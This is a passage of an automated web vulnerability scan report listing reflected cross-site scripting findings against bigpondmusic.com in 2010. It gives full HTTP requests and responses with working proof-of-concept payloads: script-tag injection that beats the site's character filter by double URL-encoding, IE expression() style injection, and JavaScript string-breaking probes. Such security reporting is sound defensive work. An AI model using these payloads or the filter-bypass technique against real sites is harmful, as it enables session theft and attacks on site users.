Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 123698


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Top 40 Albums - Album Downlo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/charts/albums/?ref=Net-Head-Music-TopAlbums70ac4"style="x:expression(alert(1))"4b25918fdd7" />
...[SNIP]...

2.263. http://bigpondmusic.com/charts/tracks [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /charts/tracks

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 614a1'%3bda62d6c1b94 was submitted in the REST URL parameter 1. This input was echoed as 614a1';da62d6c1b94 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /charts614a1'%3bda62d6c1b94/tracks HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:11:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87895


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
rabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'charts614a1';da62d6c1b94';
   s.prop4 = 'tracks';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11
...[SNIP]...

2.264. http://bigpondmusic.com/charts/tracks [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /charts/tracks

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7042%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3e90e067888 was submitted in the REST URL parameter 1. This input was echoed as e7042"><script>alert(1)</script>3e90e067888 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chartse7042%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3e90e067888/tracks HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:11:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88334


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/chartse7042"><script>alert(1)</script>3e90e067888/tracks" />
...[SNIP]...

2.265. http://bigpondmusic.com/charts/tracks [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /charts/tracks

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34b88%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e98dc59286da was submitted in the REST URL parameter 2. This input was echoed as 34b88"><script>alert(1)</script>98dc59286da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /charts/tracks34b88%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e98dc59286da HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:12:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87939


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/charts/tracks34b88"><script>alert(1)</script>98dc59286da" />
...[SNIP]...

2.266. http://bigpondmusic.com/charts/tracks [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /charts/tracks

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e7b9'%3b285e3f3024e was submitted in the REST URL parameter 2. This input was echoed as 7e7b9';285e3f3024e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /charts/tracks7e7b9'%3b285e3f3024e HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:12:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87920


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'charts';
   s.prop4 = 'tracks7e7b9';285e3f3024e';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'Non-Registered-Musi
...[SNIP]...

2.267. http://bigpondmusic.com/charts/tracks [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /charts/tracks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13646"style%3d"x%3aexpression(alert(1))"a896a2d810 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 13646"style="x:expression(alert(1))"a896a2d810 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /charts/tracks?13646"style%3d"x%3aexpression(alert(1))"a896a2d810=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:11:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 154652


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Top 40 Music Tracks - MP3 Mu
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/charts/tracks?13646"style="x:expression(alert(1))"a896a2d810=1" />
...[SNIP]...

2.268. http://bigpondmusic.com/charts/tracks/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /charts/tracks/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c2f1'%3b71f868245f was submitted in the REST URL parameter 1. This input was echoed as 1c2f1';71f868245f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /charts1c2f1'%3b71f868245f/tracks/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:48:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87892


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
rabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'charts1c2f1';71f868245f';
   s.prop4 = 'tracks';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11
...[SNIP]...

2.269. http://bigpondmusic.com/charts/tracks/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /charts/tracks/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94c03%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1728065d7a was submitted in the REST URL parameter 1. This input was echoed as 94c03"><script>alert(1)</script>a1728065d7a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /charts94c03%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1728065d7a/tracks/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:48:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88525


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/charts94c03"><script>alert(1)</script>a1728065d7a/tracks/" />
...[SNIP]...

2.270. http://bigpondmusic.com/charts/tracks/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /charts/tracks/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acaba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecde76afd208 was submitted in the REST URL parameter 2. This input was echoed as acaba"><script>alert(1)</script>cde76afd208 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /charts/tracksacaba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecde76afd208/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:48:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87998


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/charts/tracksacaba"><script>alert(1)</script>cde76afd208/" />
...[SNIP]...

2.271. http://bigpondmusic.com/charts/tracks/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /charts/tracks/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29e47'%3b93a1f67ddf was submitted in the REST URL parameter 2. This input was echoed as 29e47';93a1f67ddf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /charts/tracks29e47'%3b93a1f67ddf/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:48:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87884


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'charts';
   s.prop4 = 'tracks29e47';93a1f67ddf';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'Non-Registered-Musi
...[SNIP]...

2.272. http://bigpondmusic.com/charts/tracks/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /charts/tracks/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1386a"style%3d"x%3aexpression(alert(1))"a92dacae792 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1386a"style="x:expression(alert(1))"a92dacae792 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /charts/tracks/?1386a"style%3d"x%3aexpression(alert(1))"a92dacae792=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 02:48:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 154644


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Top 40 Music Tracks - MP3 Mu
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/charts/tracks/?1386a"style="x:expression(alert(1))"a92dacae792=1" />
...[SNIP]...

2.273. http://bigpondmusic.com/charts/tracks/ [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /charts/tracks/

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d89c"style%3d"x%3aexpression(alert(1))"f07ec62371a was submitted in the ref parameter. This input was echoed as 4d89c"style="x:expression(alert(1))"f07ec62371a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /charts/tracks/?ref=Net-Head-Music-TopTracks4d89c"style%3d"x%3aexpression(alert(1))"f07ec62371a HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:11:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 154602


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Top 40 Music Tracks - MP3 Mu
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/charts/tracks/?ref=Net-Head-Music-TopTracks4d89c"style="x:expression(alert(1))"f07ec62371a" />
...[SNIP]...

2.274. http://bigpondmusic.com/decades [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /decades

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36829%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef82e2dc5874 was submitted in the REST URL parameter 1. This input was echoed as 36829"><script>alert(1)</script>f82e2dc5874 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /decades36829%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef82e2dc5874 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87926


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/decades36829"><script>alert(1)</script>f82e2dc5874" />
...[SNIP]...

2.275. http://bigpondmusic.com/decades [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /decades

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5cfa'%3b90b3725ab42 was submitted in the REST URL parameter 1. This input was echoed as c5cfa';90b3725ab42 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /decadesc5cfa'%3b90b3725ab42 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
